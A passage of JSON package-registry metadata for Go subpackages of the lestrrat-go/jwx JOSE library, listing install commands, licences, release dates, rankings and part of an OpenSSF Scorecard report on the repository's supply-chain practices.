github.com/lestrrat-go/jwx/v2/jwe","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-12T05:44:50.601Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.075376507577022,"dependent_packages_count":4.7556286312616125,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.915502569419317},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14431079,"name":"github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwe/internal","versions_count":32,"first_release_published_at":"2026-05-12T05:45:40.944Z","latest_release_published_at":"2026-05-12T05:45:40.944Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-12T05:45:44.929Z","created_at":"2026-05-12T05:44:49.793Z","updated_at":"2026-05-12T05:45:44.929Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt","install_command":"go get github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-12T05:44:50.595Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.075376507577022,"dependent_packages_count":4.7556286312616125,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.915502569419317},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/content_crypt/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcontent_crypt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcontent_crypt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcontent_crypt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcontent_crypt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcontent_crypt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcontent_crypt/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14431082,"name":"github.com/lestrrat-go/jwx/v2/jwe/internal/keygen","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwe/internal","versions_count":32,"first_release_published_at":"2026-05-12T05:45:42.679Z","latest_release_published_at":"2026-05-12T05:45:42.679Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-12T05:45:47.697Z","created_at":"2026-05-12T05:44:50.546Z","updated_at":"2026-05-12T06:02:26.682Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/keygen","install_command":"go get github.com/lestrrat-go/jwx/v2/jwe/internal/keygen","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/keygen#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-12T05:44:50.732Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.075376507577022,"dependent_packages_count":4.7556286312616125,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.915502569419317},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe/internal/keygen","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/keygen","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/keygen","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/keygen/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeygen/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeygen/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeygen/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeygen/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeygen/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeygen/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14431080,"name":"github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwe/internal","versions_count":32,"first_release_published_at":"2026-05-12T05:45:36.189Z","latest_release_published_at":"2026-05-12T05:45:36.188Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-12T05:45:38.028Z","created_at":"2026-05-12T05:44:50.224Z","updated_at":"2026-05-12T05:45:38.028Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc","install_command":"go get github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-12T05:44:50.596Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.075376507577022,"dependent_packages_count":4.7556286312616125,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.915502569419317},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/keyenc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeyenc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeyenc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeyenc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeyenc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeyenc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fkeyenc/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14431087,"name":"github.com/lestrrat-go/jwx/v2/jwt","ecosystem":"go","description":"Package jwt implements JSON Web Tokens as described in https://tools.ietf.org/html/rfc7519","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":32,"first_release_published_at":"2026-05-12T05:45:41.833Z","latest_release_published_at":"2026-05-12T05:45:41.833Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-12T05:45:46.245Z","created_at":"2026-05-12T05:44:56.010Z","updated_at":"2026-05-12T05:45:46.245Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwt","install_command":"go get github.com/lestrrat-go/jwx/v2/jwt","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwt#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-12T05:44:56.183Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.075376507577022,"dependent_packages_count":4.7556286312616125,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.915502569419317},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwt/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14431078,"name":"github.com/lestrrat-go/jwx/v2/jwe/internal/cipher","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwe/internal","versions_count":32,"first_release_published_at":"2026-05-12T05:45:35.280Z","latest_release_published_at":"2026-05-12T05:45:35.280Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-12T05:45:36.916Z","created_at":"2026-05-12T05:44:49.619Z","updated_at":"2026-05-12T05:45:36.916Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/cipher","install_command":"go get github.com/lestrrat-go/jwx/v2/jwe/internal/cipher","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/cipher#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-12T05:44:50.601Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.075376507577022,"dependent_packages_count":4.7556286312616125,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.915502569419317},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe/internal/cipher","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/cipher","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/cipher","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/cipher/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcipher/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcipher/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcipher/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcipher/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcipher/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fcipher/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11403761,"name":"github.com/lestrrat-go/jwx/v2/jwt/internal/types","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwt/internal","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2025-12-16T08:56:46.856Z","latest_release_number":null,"last_synced_at":"2026-06-08T04:18:53.788Z","created_at":"2025-03-04T19:39:43.994Z","updated_at":"2026-06-08T04:18:53.788Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwt/internal/types","install_command":"go get github.com/lestrrat-go/jwx/v2/jwt/internal/types","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwt/internal/types#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during 